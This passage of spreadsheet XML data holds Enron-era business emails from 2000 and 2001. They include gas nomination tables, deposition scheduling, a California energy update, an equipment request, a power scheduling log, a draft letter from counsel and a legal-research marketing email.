to  receive event invitations from us, please respond by typing "no events"=_x000D_
=20_x000D_
in the  subject line. If you wish not to receive email from PennFuture,=20_x000D_
please respond  by typing "remove" in the subject line._x000D_
_x000D_
 - Pttsbrgh Green Energy Lunch regform_31401.doc</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 07:00:36 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Company: 000236     Arng: 37147-00709     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        24                    24_x000D_
Working                          24                    24_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01848     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        87                    87_x000D_
Working                          87                    87_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01849     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        13                    13_x000D_
Working                          13                    13_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01850     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       208                   208_x000D_
Working                         208                   208_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01851     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         6                     6_x000D_
Working                           6                     6_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01891     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        19                    19_x000D_
Working                          19                    19_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01918     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        24                    24_x000D_
Working                          24                    24_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01919     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        79                    79_x000D_
Working                          79                    79_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01920     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        84                    84_x000D_
Working                          84                    84_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01921     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       401                   401_x000D_
Working                         401                   401_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01923     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       312                   312_x000D_
Working                         312                   312_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-01960     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       550                   550_x000D_
Working                         550                   550_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-05683     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        46                    46_x000D_
Working                          46                    46_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 37147-10160     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                        24                    24_x000D_
Working                          24                    24_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
_x000D_
Company: 000236     Arng: 66917-00009     Eff Date: 2001-11-16_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       225                   225_x000D_
Working                         225                   225_x000D_
Capacity Allocation               0  CCR                0_x000D_
Confirmed                         0                     0_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 08:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: depositions of enron officials</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, Dan.  We will work to accommodate your schedule._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daniel Reck_x000D_
11/28/2000 04:31 PM_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: depositions of enron officials  _x000D_
_x000D_
I'm out the first week of January, but have nothing else scheduled.  I _x000D_
reserve the right to reschedule anything at anytime if there is a commercial _x000D_
need._x000D_
_x000D_
--Dan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michelle Cash_x000D_
11/28/2000 03:50 PM_x000D_
To: George McClellan/HOU/ECT@ECT, Daniel Reck/HOU/ECT@ECT, Michael J _x000D_
Beyer/HOU/ECT@ECT, Andrea Bennett/HOU/ECT@ECT, Tom Mcquade/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: depositions of enron officials_x000D_
_x000D_
Hello, everyone.  Please let me know which of these dates works best for _x000D_
you.  It would be most helpful if you give me a range of available dates for _x000D_
both preparation and the deposition itself.  That way, I can find overlapping _x000D_
dates on which you all are available.  _x000D_
_x000D_
Thanks a lot._x000D_
_x000D_
Michelle_x000D_
_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 11/28/2000 03:48 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Tim C. Carrico" &lt;tcarrico@spilmanlaw.com&gt; on 11/28/2000 07:15:09 AM_x000D_
To: "Michelle Cash (E-mail)" &lt;michelle.cash@enron.com&gt;_x000D_
cc: "Charles L. Woody" &lt;cwoody@spilmanlaw.com&gt; _x000D_
Subject: depositions of enron officials_x000D_
_x000D_
_x000D_
Michelle,_x000D_
_x000D_
 Yesterday, counsel for Richard Clonch called, requesting January_x000D_
dates for the Enron depositions.  He provided me with the following dates_x000D_
possible dates; 1/3, 1/4, 1/5, 1/8, 1/9, 1/10, 1/11, 1/12, 1/22, 1/23, 1/24,_x000D_
1/25, 1/26._x000D_
_x000D_
 I told him that I would forward these dates to Enron.  I will send_x000D_
counsel for Richard Clonch availability dates for Enron Officials as soon as_x000D_
I hear from you._x000D_
_x000D_
 Thanks_x000D_
_x000D_
Tim C. Carrico_x000D_
Spilman Thomas &amp; Battle, PLLC_x000D_
email: tcarrico@spilmanlaw.com_x000D_
phone:             (304)-340-3856_x000D_
cell phone:       (304)-549-2681_x000D_
fax:                  (304)-340-3801_x000D_
address:           300 Kanawha Blvd., East_x000D_
                       Charleston, W.Va. 25301_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>GE and other updates</t>
  </si>
  <si>
    <t xml:space="preserve">We had the legal call on Wednesday.  It was Mike, Kent and me. You didn't _x000D_
miss much.  They are waiting on us, and I didn't want to give them anything _x000D_
we hadn't discussed internally._x000D_
_x000D_
I asked Rose to have the Coyote Springs contract OBS'ed (off balance _x000D_
sheet-ed).  She should have something shortly. _x000D_
_x000D_
By the way, the contact sheet that Steve distributed was the one we prepared._x000D_
_x000D_
I'll catch you up on other stuff when you have time.  Nothing urgent..._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 19:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Update 6/5/01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
EXECUTIVE SUMMARY_x000D_
?	SoCal. Ed MOU Introduced as Bill_x000D_
?	House Committee Douses Emergency Energy Relief Act_x000D_
_x000D_
MOU Has Its Day_x000D_
Sources report that California Senator Polanco has introduced the legislation today for the MOU between the Governor and SoCal Edison (SB 78XX).  As reported earlier, sources still believe that there is not sufficient legislative support for this measure to pass.  Senator Polanco's political career was earlier jeopardized by personal scandal and now sources feel his MOU sponsorship may be nothing more than a quid pro quo attempt to gain support from Davis.  Additionally, the CPUC has added two necessary MOU provisions to its next week voting agenda, though support for these issues remains weak on the CPUC board.   _x000D_
_x000D_
House Energy Relief Efforts_x000D_
The House Energy and Commerce Committee gave up plans to ease California's energy woes because Republicans and Democrats could not settle a long standing debate over price caps in the West.  Representative Waxman admitted a compromise was never more than a noble idea throughout the debates, and several delayed mark-up sessions for the bill.  Barton noted the bill had little chance of aid California considering the time it would take to pass the bill would be longer than the California summer. _x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Aug 2001 12:55:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jean.mcfarland@enron.com', "karon.o'gorman@enron.com"})</t>
  </si>
  <si>
    <t>RE: 14 flat panels</t>
  </si>
  <si>
    <t>Jean,  all is correct except that Steve Harris should get two flat screens instead of Michelle and me getting a third panel.  However, I did want to mention to you that I would like for Michelle to have a third flat screen since she handles all of our EOL transactions thereby giving her a screen for Dashboard/Pipeline Profile, Outlook and EOL.  Is there an extra one around for her?  _x000D_
 _x000D_
Many thanks, _x000D_
Kim_x000D_
_x000D_
-----Original Message-----_x000D_
From: O'Gorman, Karon _x000D_
Sent: Tuesday, August 07, 2001 10:44 AM_x000D_
To: McFarland, Jean_x000D_
Cc: Watson, Kimberly_x000D_
Subject: RE: 14 flat panels _x000D_
_x000D_
_x000D_
I have not received these yet.  I am checking on thru Buyer-Mark Adleman_x000D_
 _x000D_
Thanks, Karon_x000D_
_x000D_
-----Original Message-----_x000D_
From: McFarland, Jean _x000D_
Sent: Tuesday, August 07, 2001 7:45 AM_x000D_
To: O'Gorman, Karon_x000D_
Cc: Watson, Kimberly_x000D_
Subject: RE: 14 flat panels _x000D_
_x000D_
_x000D_
Karon -- also the laptop for Kim???  Thanks.  Jean_x000D_
 _x000D_
-----Original Message-----_x000D_
From: McFarland, Jean _x000D_
Sent: Tuesday, August 07, 2001 7:32 AM_x000D_
To: O'Gorman, Karon_x000D_
Cc: Watson, Kimberly_x000D_
Subject: 14 flat panels _x000D_
_x000D_
_x000D_
Karon -- did we get in those 14 15" flat panels yet?  They need to go to the following people..._x000D_
 _x000D_
1 to Kim Watson (she already had 2)_x000D_
1 to Michelle Lokay (she already has 2)_x000D_
2 to Palu G._x000D_
2 to Jan Moore_x000D_
2 to Lorainne Lindberg_x000D_
2 to TK Lohman_x000D_
2 to Lindy Donoho_x000D_
2 to Jeff Fawcett's desk (he's gone.. right next to Lorainne)_x000D_
14_x000D_
 _x000D_
Kim -- is this distribution correct?_x000D_
 _x000D_
Thanks.  Jean</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 22:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 3/8/01; HourAhead hour: 7;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 3/8/01; HourAhead hour: 7;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001030807.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 7 / Preferred:   2.22 / Final:   2.20)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE4_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 3/8/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 07:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kim.theriot@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Kim/Sara _x000D_
Please find below a copy of the master agreement TD wish to use._x000D_
_x000D_
Regards_x000D_
---------------------- Forwarded by Treasa Kirby/LON/ECT on 15/11/2000 15:15 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Treasa Kirby_x000D_
15/11/2000 10:28_x000D_
To: Matthew Landy/OSL/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: New fax received (Likely sender: )._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Treasa Kirby/LON/ECT on 15/11/2000 10:31 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
London Fax System_x000D_
10/11/2000 17:07_x000D_
To: Treasa Kirby/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: New fax received (Likely sender: )._x000D_
_x000D_
_x000D_
You have received a new fax from _x000D_
_x000D_
The image contains 31 page(s)._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 04:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: We need actual bottom line numbers -- no "notional" stuff,_x000D_
 right?</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 06/30/2000 11:04 AM -----_x000D_
_x000D_
	John Malowney_x000D_
	06/30/2000 10:53 AM_x000D_
		_x000D_
		 To: Robert McCullough &lt;robert@mresearch.com&gt; @ ENRON_x000D_
		 cc: Doug Thomas &lt;Doug.Thomas@bellcold.com&gt;, John Cameron _x000D_
&lt;johncameron@dwt.com&gt;, Tracy Ngo/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT_x000D_
		 Subject: Re: We need actual bottom line numbers -- no "notional" stuff, _x000D_
right?_x000D_
_x000D_
Then we pass.... there is no sense going through "yesterdays fire drill" when _x000D_
we don't have the necessary "paper" in place in order to execute.  We _x000D_
appreciate the interest, next time with a little more forewarning, I'm sure _x000D_
Enron will competitively be in the hunt.  Let us know is you'd like us to _x000D_
continue working on the necessary contracts for future use.  Thanks, John_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Robert McCullough &lt;robert@mresearch.com&gt;                           _x000D_
06/30/2000 08:21 AM_x000D_
	_x000D_
_x000D_
To: John Malowney &lt;John.Malowney@enron.com&gt;_x000D_
cc:  _x000D_
Subject: We need actual bottom line numbers -- no "notional" stuff, right?_x000D_
_x000D_
_x000D_
Clients are hopping up and down -- I am expecting a beer for my loyal_x000D_
Enron services this week . . ._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 05:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Draft Letter to ISO</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 03/02/2001 01:46 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Fergus, Gary S." &lt;GFergus@brobeck.com&gt;                           _x000D_
03/02/2001 01:26 PM_x000D_
	_x000D_
_x000D_
To: "Timothy Belden (E-mail)" &lt;tim.belden@enron.com&gt;, _x000D_
"'Bill.williams.iii@enron.com'" &lt;Bill.williams.iii@enron.com&gt;, "Mary C. Hain _x000D_
(E-mail)" &lt;mary.hain@enron.com&gt;, "Christian. Yoder (E-mail)" _x000D_
&lt;cyoder@enron.com&gt;, "Richard B. Sanders Esq. (E-mail)" _x000D_
&lt;richard.b.sanders@enron.com&gt;_x000D_
cc: "Jeffrey S. Richter (E-mail)" &lt;jeff.richter@enron.com&gt; _x000D_
Subject: Draft Letter to ISO_x000D_
_x000D_
_x000D_
PRIVILEGED AND CONFIDENTIAL_x000D_
ATTORNEY CLIENT COMMUNICATION_x000D_
ATTORNEY WORK PRODUCT_x000D_
Tim,_x000D_
 Bill asked that I include you in reviewing this draft letter to the_x000D_
ISO explaining why we cannot produce data today.  Please call me with_x000D_
comments._x000D_
 &lt;&lt;hildebrandt3.2.doc&gt;&gt;_x000D_
Thanks_x000D_
Gary_x000D_
_x000D_
=======================================================_x000D_
This email message is for the sole use of the intended recipient(s) and may _x000D_
contain confidential and privileged information. Any unauthorized review, _x000D_
use, disclosure or distribution is prohibited. If you are not the intended _x000D_
recipient, please contact the sender by reply email and destroy all copies of _x000D_
the original message._x000D_
_x000D_
To reply to our email administrator directly, send an email to _x000D_
postmaster@brobeck.com_x000D_
BROBECK PHLEGER &amp; HARRISON LLP_x000D_
http://www.brobeck.com_x000D_
_x000D_
_x000D_
_x000D_
 - hildebrandt3.2.doc_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 08:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Find The Missing Law Link</t>
  </si>
  <si>
    <t xml:space="preserve">TO: Mark E. Haedicke_x000D_
RE: Take TheLaw.net Challenge!_x000D_
FROM: Mark Whitney, CEO/President, TheLaw.net Corporation_x000D_
HOMEPAGE: http://www.thelaw.net  REMOVE: http://www.thelaw.net/remove.htm_x000D_
_x000D_
If you are a savvy legal compusearcher you will not want to miss this _x000D_
opportunity to take the TheLaw.net Challenge, below. On the other hand, if _x000D_
you ever feel challenged when it comes to computer research, stay with us. We _x000D_
can help._x000D_
_x000D_
Before you begin, forget that TheLaw.net's searchable cases overlap West and _x000D_
Lexis' to the tune of more than four million entries across more than 175 _x000D_
Federal and state appellate jurisdictions. Just put it out of your mind._x000D_
_x000D_
Forget that it is very easy, using our software, to quickly learn for _x000D_
yourself how courts have treated the particular cite, statute, rule or _x000D_
regulation you are interested in learning more about. Forget that it is easy _x000D_
for you to quickly pop up cases when all you have is a cite, party name, _x000D_
author, counsel, court, and so forth._x000D_
_x000D_
Forget that one of the major differences between TheLaw.net and The Two _x000D_
Headed Monster, is that everyone gets all of our highly usable, authoritative _x000D_
data with a national scope, all for a low flat rate. Finally, forget (if you _x000D_
can) that TheLaw.net delivers all of this and much, much more, on an _x000D_
unlimited use basis, directly to your desktop under the following terms and _x000D_
conditions:_x000D_
_x000D_
--$345 annually for you; regularly $395 (Save $50 until April 30)_x000D_
--$575 for you and a partner, annual unlimited use rate (Small Office Special)_x000D_
--$1195 for you and four others, annual unlimited use rate (Workgroup Edition)_x000D_
--April Enterprise Specials:_x000D_
----$1895 for 10 annual, unlimited use rate (April Special)_x000D_
----$3995 for 25 annual, unlimited use rate (April Special)_x000D_
----$7995 for 50 annual unlimited use rate (April Special)_x000D_
--pay only for active users_x000D_
--paralegals, librarians and backoffice staff are on us_x000D_
--conduct real legal research with a seamless national scope_x000D_
--all subscribers install at work, at home and on their laptops_x000D_
--no passwords or user names_x000D_
--unlimited tech and reference attorney aftercare_x000D_
--no CDs to chase around the office_x000D_
--all you can eat - no surprises - no gamesmanship_x000D_
--30 day unconditional money back guarantee_x000D_
--to subscribe, go to our homepage and click "SIGN ME UP":_x000D_
http://www.thelaw.net_x000D_
_x000D_
We recognize that West and Lexis are King when it comes to enhancing public _x000D_
records and churning them in their searchable databases. But, for all of _x000D_
these highfalutin enhancements, one rarely hears the word value uttered in _x000D_
the same sentence with the names of either of these two companies._x000D_
_x000D_
Which leads to some questions that you ought to be asking:_x000D_
_x000D_
Q: How much are all of these enhancements worth to you?_x000D_
Q: Are these enhancements timesaving or frustrating?_x000D_
Q: Does it make sense to continue with onerous annual contracts?_x000D_
Q: Can the list of expensive items be shortened with low, flat-rate options?_x000D_
Q: Rather than switching, should you simply redefine relationships with _x000D_
existing vendors in light of less expensive, authoritative options?_x000D_
Q: How can you ever expect to fully leverage publicly available web based _x000D_
documents and databases on behalf of the enterprise in the absence of a set _x000D_
of standards, processes and best practices for doing so?_x000D_
_x000D_
The answer to the last question is to have a one-stop front-end to that _x000D_
subset of the more than two billion pages online that belong a click or two _x000D_
away on your desktop. That's where we come in. Proprietary searchable case _x000D_
law aside, TheLaw.net, not West or Lexis, is King when it comes to getting _x000D_
you around online._x000D_
_x000D_
--WEB BASED PRIMARY AUTHORITY JUST KEEPS GETTING BETTER_x000D_
_x000D_
There is no longer a debate about whether publicly available web based _x000D_
documents and databases will continue to loom large in the practice of law. _x000D_
That debate was completely foreclosed when West recently bought FindLaw for a _x000D_
reported $37M and Lexis poured a bunch of money into a portal called _x000D_
lexisONE. Both companies are now attempting to brand these free sites as the _x000D_
best place to begin when you want to find authoritative information on the _x000D_
public web._x000D_
_x000D_
Are these web sites the best place for seasoned professionals to begin? As an _x000D_
attorney, you are, per se, a sophisticated consumer of information. _x000D_
Accordingly, we invite you to take TheLaw.net Challenge and decide for _x000D_
yourself._x000D_
_x000D_
--HERE IS YOUR ASSIGNMENT SHOULD YOU CHOOSE TO ACCEPT IT_x000D_
_x000D_
Using lexisONE, find Chapter 60 (Tax) of the Consolidated Laws of New York. _x000D_
Do you have a stopwatch or timer ready? Good. By the way, lexisONE is located _x000D_
at: http://www.lexisone.com. Before starting, read on for a heads up on a _x000D_
couple of key factors relevant to your assignment._x000D_
_x000D_
Starting at lexisONE should give you a big advantage. Why? Well, to begin _x000D_
with, this is Lexis we're talking about; the same company that just took out _x000D_
a full page ad in the current edition of Law Office Computing which claims, _x000D_
in relevant part, that if "you're a solo or small-firm attorney, the LexisONE _x000D_
service has everything you need to practice more effectively, run your office _x000D_
more efficiently, and keep up with the latest legal tools and trends."_x000D_
_x000D_
So are you ready? Are you excited? You should be, because you are about to _x000D_
discover just how effective and efficient you can be using lexisONE since, _x000D_
after all, they have "everything you need"._x000D_
_x000D_
Oh yes. One more datapoint before you begin. If you are lucky enough to _x000D_
eventually locate the link to the Consolidated Laws of New York that lexisONE _x000D_
provides, be forewarned that this link has been DYSFUNCTIONAL for at least _x000D_
the past two weeks._x000D_
_x000D_
Why? Well, for one thing, the State of New York upgraded its massive web site _x000D_
on, or about, March 23, 2001. Since then, this portion of lexisONE's site has _x000D_
suffered from a nasty case of LINKROT. Translation: lexisONE is not current _x000D_
or complete as to some critical primary authority._x000D_
_x000D_
At some point the people at lexisONE obviously determined that the _x000D_
Consolidated Laws of New York were indeed among the items needed to "practice _x000D_
more effectively". Today it is hard to know what they think._x000D_
_x000D_
--WE PROMISED YOU A CHALLENGE_x000D_
_x000D_
Are you skilled enough to PRETEND that the link is working while trying to _x000D_
find it anyway? This way you can still get a feel for the effectiveness and _x000D_
efficiency you would have experienced using lexisONE had the link been _x000D_
working. Incidentally, if using lexisONE, you can find this link in less than _x000D_
two minutes, you are a God to us! Really._x000D_
_x000D_
Now snap back to reality and consider that when you have a subscription to _x000D_
TheLaw.net you can view the specific page containing Chapter 60 of the _x000D_
Consolidated Laws in six or seven seconds by simply sliding through our _x000D_
smooth hierarchy of pre-configured Federal and State Statutes Menu. Once you _x000D_
locate the law you want to know more about, you can enter the statutory cite _x000D_
into our case law search engine, check New York from among the 175+ Federal _x000D_
and state appellate jurisdictions at your fingertips and quickly pop up a _x000D_
list of relevant cases that have construed the item you need to know more _x000D_
about._x000D_
_x000D_
--THELAW.NET IS A BETTER MOUSETRAP. PERIOD._x000D_
_x000D_
Free web site portals are fine for law students or an occasional reference _x000D_
when you are not under the gun. But, unless you have complete disregard for _x000D_
your time and your clients' best interests, if you are browsing the public _x000D_
web for purposes of serious research, you should have the right tool for the _x000D_
job. Only then will you be as "efficient" and "effective" as possible. The _x000D_
last thing you need is another ill-considered free web site._x000D_
_x000D_
--REMEMBER THAT CASE LAW WE TOLD YOU TO FORGET?_x000D_
_x000D_
You can stop forgetting now and consider that subscribers to TheLaw.net _x000D_
Professional Legal Browser not only get all of that great case law with a _x000D_
national scope, but they receive slick, pre-configured menu-driven access to _x000D_
more than 50,000 web based documents and databases including Federal and _x000D_
state statutes, rules, forms, regulations, executive agency databases, _x000D_
legislative tracking tools, every major metropolitan newspaper, local rules _x000D_
and forms, pattern jury instructions, court calendars and contact _x000D_
information, expedited pathfinders to most Federal dockets, executive agency _x000D_
databases, columnists, real-time national news and wire services, corporate _x000D_
backgrounders, polls, searchable dictionaries, encyclopedias, calculators, _x000D_
selected law journals and law reviews, nearly 10,000 helpers arranged across _x000D_
dozens of practice areas, and much, much more._x000D_
_x000D_
If lexisONE "has everything you need" how can it be that we have 30,000 more _x000D_
deep-links to web based documents and databases and 35,000 more than FindLaw? _x000D_
Hmmm._x000D_
_x000D_
--THELAW.NET: THE SUM OF THE ALTERNATIVES_x000D_
_x000D_
Within one business day of New York upgrading their web site, subscribers to _x000D_
TheLaw.net were informed via a free special email alert that we had updated _x000D_
their software and that the new homepage for the Consolidated Laws is right _x000D_
here:_x000D_
http://assembly.state.ny.us/leg/?cl=0_x000D_
_x000D_
As of this writing (Sunday, April 8, 2001) LexisONE is still linked to the _x000D_
old outmoded location: http://assembly.state.ny.us/cgi-bin/claws_x000D_
_x000D_
Once this message gets passed around the Net someone at Lexis will see it and _x000D_
fix the broken link. We are happy to help out, because even when the New York _x000D_
Consolidated and Unconsolidated Law links are finally functional, LexisONE _x000D_
still merely provides the following:_x000D_
_x000D_
--one link to New York Consolidated Laws Homepage_x000D_
--one link to New York Unconsolidated Laws Homepage_x000D_
--one link to the New York Constitution Homepage_x000D_
_x000D_
--Cf. THELAW.NET PROFESSIONAL BROWSER:_x000D_
_x000D_
--Linking by Constitutional Article, we provide 22 hand-titled links to the _x000D_
New York Constitution._x000D_
--Linking by Statutory Subject Matter we provide 96 hand-titled links to the _x000D_
New York Consolidated Laws, plus one link to the Consolidated Laws Homepage _x000D_
and one link to the Consolidated Laws Index for a total of 98 links._x000D_
--Linking by Statutory Subject Matter we provide 25 hand-titled links to the _x000D_
New York Unconsolidated Laws, plus one link to the Unconsolidated Laws _x000D_
Homepage for a total of 26 links._x000D_
--We provide an additional separate link to the search interface for these _x000D_
laws._x000D_
--In total, TheLaw.net provides 147 hand-titled, deep-links just to this _x000D_
discrete subset of New York primary authority._x000D_
--LexisONE provides three links and two of them are broken._x000D_
_x000D_
TheLaw.net literally removes more than 90% of the time wasted online. If you _x000D_
begin with lexisONE or FindLaw, you need to add an additional layer of effort _x000D_
to get to specific statutory subject areas of the Consolidated Laws that we _x000D_
completely eliminate with our detailed deep-links._x000D_
_x000D_
--ON THE OTHER HAND, LEXISONE MAY BE "GOOD ENOUGH"_x000D_
_x000D_
Surely, lexisONE must have some replicable process in place for maintaining _x000D_
their links. But if statutes from a major metropolitan state can disappear _x000D_
from the radar, what happens when you have a really important issue to _x000D_
research, such as: "Do Trendy Clothes Catch Trendy Clients?" We are not _x000D_
lying. See for yourself. (This link works.)_x000D_
http://www.lexisone.com/lifestyle/style/040101b.html_x000D_
_x000D_
It could be that our standards are unreasonably high. Maybe we should take _x000D_
our lead from Lexis-Nexis Chief Technology Officer Allan McLaughlin who made _x000D_
the following lexisONE observation in the recent article "Lexis-Nexis and _x000D_
West Battle Online", published by The American Lawyer and law.com: "It's not _x000D_
our best product," confides McLaughlin, "but for a lot of lawyers, it's good _x000D_
enough.'"_x000D_
_x000D_
Good enough? Hopefully you are not one of the THOSE lawyers._x000D_
_x000D_
Given the inclusion, in our tool, of searchable proprietary case law, we have _x000D_
tried to clarify some of the differences between a marginally maintained free _x000D_
directory and a true best practices software solution. We thank you for _x000D_
taking TheLaw.net Challenge._x000D_
_x000D_
--YOU ARE NOW CORDIALLY INVITED TO VISIT OUR WEB SITE_x000D_
_x000D_
Homepage: http://www.thelaw.net_x000D_
Check our TOP 25 FAQs: http://www.thelaw.net/faqs.htm_x000D_
Check our References: http://www.thelaw.net/references.htm_x000D_
View Sample Tutorials: http://www.thelaw.net/searchdemo/home.htm_x000D_
Our prices are always at: http://www.thelaw.net/subscribe.htm_x000D_
Sign up online at: http://www.thelaw.net/fulfillment.htm_x000D_
Call toll free with any questions and we'll book a subscription for you:_x000D_
1.877.4.LAWNET [877.452.9638]_x000D_
_x000D_
--CONSIDER OUR VISION: A FIRM FOUNDATION AT A LOW FLAT-RATE_x000D_
_x000D_
